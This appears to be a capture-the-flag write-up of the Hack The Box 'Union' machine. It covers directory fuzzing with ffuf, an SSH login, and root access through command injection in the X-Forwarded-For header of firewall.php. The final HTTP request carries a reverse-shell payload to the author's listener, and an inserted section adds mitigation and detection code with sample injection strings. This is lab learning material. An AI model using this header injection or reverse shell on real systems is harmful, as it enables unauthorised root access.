
Union (Linux)

1. Starting on User!

Summarizing from the point where I started writing this write-up, heh.

 

So the Nginx web root config file is over there.

Opening the config.php file found with ffuf

Everyone keeps going "ffuf, ffuf", so I gave it a try lol

┌──(root㉿P00075445-006)-[/home/surckers]
└─# ffuf -t 1000 -w directory-list-2.3-big.txt -u http://union.htb/FUZZ -e .php

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://union.htb/FUZZ
 :: Wordlist         : FUZZ: /home/surckers/directory-list-2.3-big.txt
 :: Extensions       : .php
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 1000
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

# license, visit http://creativecommons.org/licenses/by-sa/3.0/ .php [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 302ms]
# Copyright 2007 James Fisher [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 303ms]
#.php                   [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 303ms]
# or send a letter to Creative Commons, 171 Second Street, .php [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 303ms]
# This work is licensed under the Creative Commons .php [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 303ms]
#.php                   [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 303ms]
# Attribution-Share Alike 3.0 License. To view a copy of this  [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 304ms]
#                       [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 304ms]
# on atleast 1 host     [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 304ms]
# This work is licensed under the Creative Commons  [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 305ms]
#.php                   [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 305ms]
# Suite 300, San Francisco, California, 94105, USA..php [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 304ms]
#                       [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 309ms]
# Copyright 2007 James Fisher.php [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 310ms]
# on atleast 1 host.php [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 308ms]
# Priority ordered case sensative list, where entries were found .php [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 310ms]
#                       [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 310ms]
# Priority ordered case sensative list, where entries were found  [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 310ms]
# directory-list-2.3-big.txt.php [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 310ms]
                        [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 310ms]
index.php               [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 310ms]
# Attribution-Share Alike 3.0 License. To view a copy of this .php [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 310ms]
# or send a letter to Creative Commons, 171 Second Street,  [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 310ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/  [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 310ms]
# directory-list-2.3-big.txt [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 310ms]
#                       [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 315ms]
#.php                   [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 280ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 295ms]
css                     [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 286ms]
firewall.php            [Status: 200, Size: 13, Words: 2, Lines: 1, Duration: 283ms]
config.php              [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 282ms]
challenge.php           [Status: 200, Size: 772, Words: 48, Lines: 21, Duration: 510ms]
                        [Status: 200, Size: 1220, Words: 158, Lines: 43, Duration: 279ms]

Looking through the default nginx config file

After confirming the web root, check the php files

 

I thought SSH-ing in would be the end of it. What is this? lol, ridiculous.

Why won't ssh connect? Whatever..

(06/26: starting over from User lol)

Tried ssh with what I already had (see, there was no way it wouldn't work~)

C:\Users\LGCNS>ssh 10.129.96.75

The authenticity of host '10.129.96.75 (10.129.96.75)' can't be established.
ED25519 key fingerprint is SHA256:hE6H4DrsHebfs+gclhz9SL77tMpy8aKR3vp8Y0NRDvY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.96.75' (ED25519) to the list of known hosts.
cns\mylife727@10.129.96.75's password:
Permission denied, please try again.
cns\mylife727@10.129.96.75's password:

C:\Users\LGCNS>ssh uhc@10.129.96.75

uhc@10.129.96.75's password:
Permission denied, please try again.
uhc@10.129.96.75's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Nov  8 21:19:42 2021 from 10.10.14.8
uhc@union:~$

 

2. Starting privilege escalation!

#challenge.php
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 26 Jun 2024 15:30:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Set-Cookie: PHPSESSID=h1mk47rjmb664o45r21p5qbv3e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 1083

Sorry, <?php
require('config.php');

if (!($_SESSION['Authenticated'])) {
echo "Access Denied";
exit;
}

?>
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<!------ Include the above in your HEAD tag ---------->

<div class="container">
<h1 class="text-center m-5">Join the UHC - November Qualifiers</h1>

</div>
<section class="bg-dark text-center p-5 mt-4">
	<div class="container p-5">

<?php
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
$ip = $_SERVER['REMOTE_ADDR'];
};
system("sudo /usr/sbin/iptables -A INPUT -s " . $ip . " -j ACCEPT");
?>
<h1 class="text-white">Welcome Back!</h1>
<h3 class="text-white">Your IP Address has now been granted SSH Access.</h3>
</div>
</section>
</div>
you are not eligible due to already qualifying.
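Added example, not code from the write-up or from the box itself: the `$ip` above goes from the X-Forwarded-For header straight into `system()`, so the fix on the PHP side is to accept the header only when it parses as an address (`filter_var($ip, FILTER_VALIDATE_IP)`) and otherwise fall back to `REMOTE_ADDR`. The Python below mirrors that check with the standard `ipaddress` module and adds the detection side, flagging header values that carry shell metacharacters, run over a few constructed sample header values (the function names, `SAMPLE_HEADERS`, and the fallback address are assumptions for the example).

```python
import ipaddress
import re

# Constructed sample X-Forwarded-For values for the example (not captured
# traffic; the injected commands are harmless placeholders).
SAMPLE_HEADERS = [
    "10.10.14.37",                     # plain client IP from a proxy
    "2001:db8::1",                     # IPv6 is legitimate too
    "1.1.1.1; sudo bash -c \"id\";",   # IP with commands appended via ';'
    "1.1.1.1 && ping -c1 127.0.0.1",   # same idea using '&&'
    "203.0.113.5, 10.0.0.2",           # proxy chain: several comma-separated hops
    "",                                # empty header
]

# Characters that have meaning to sh and have no place in an IP address list.
SHELL_META = re.compile(r"[;&|`$(){}<>\n\\\"']")


def _is_ip(text):
    """True if `text` is a syntactically valid IPv4 or IPv6 address."""
    try:
        ipaddress.ip_address(text)
        return True
    except ValueError:
        return False


def client_ip_from_xff(value, fallback):
    """Mitigation: return the first X-Forwarded-For hop only if it parses as
    an IP address, otherwise return `fallback` (the REMOTE_ADDR equivalent).
    This is the check firewall.php lacks; 'ip; command' never reaches a shell."""
    first_hop = value.split(",", 1)[0].strip() if value else ""
    try:
        return str(ipaddress.ip_address(first_hop))
    except ValueError:
        return fallback


def looks_like_injection(value):
    """Detection: flag a header value that is not a clean list of IPs and
    contains shell metacharacters, the shape of the request in this write-up."""
    hops = [h.strip() for h in value.split(",")] if value else []
    all_ips = bool(hops) and all(_is_ip(h) for h in hops)
    return (not all_ips) and bool(SHELL_META.search(value or ""))


def triage(headers, remote_addr="10.129.96.75"):
    """Run both checks over header values; returns (resolved_ip, flagged) pairs."""
    return [(client_ip_from_xff(h, remote_addr), looks_like_injection(h))
            for h in headers]


if __name__ == "__main__":
    for header, (ip, flagged) in zip(SAMPLE_HEADERS, triage(SAMPLE_HEADERS)):
        print(f"{header!r:40} -> use {ip:15} flagged={flagged}")
```

Even with the parse check in place, the design is still weak: X-Forwarded-For is set by whoever sends the request, so a valid-looking address in it should only be trusted when nginx is behind a proxy you control, and opening an iptables rule from it gives any visitor a way to allow-list an address of their choosing.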

Let's grab a reverse shell through X-Forwarded-For with sudo~!

I went through needless trouble because of the double quotes I had tacked on; the commands are separated with ;

Everyone knows this, right?

The difference between the ||, &&, and ; metacharacters! First, test with ping!

GET /firewall.php HTTP/1.1
Host: union.htb
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: ko-KR
Referer: http://union.htb/challenge.php
X-Forwarded-for: 1.1.1.1; sudo bash -c "sh -i >& /dev/tcp/10.10.14.37/3333 0>&1";
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=mf1og32c8ofgliaebqi4udcnmr
Connection: keep-alive

D:\pentestSW\netcat-win32-1.11\netcat-1.11>nc -lvnp 3333
listening on [any] 3333 ...
connect to [10.10.14.37] from (UNKNOWN) [10.129.96.75] 45730
sh: 0: can't access tty; job control turned off
# whoami
root
# cat /root/root.txt
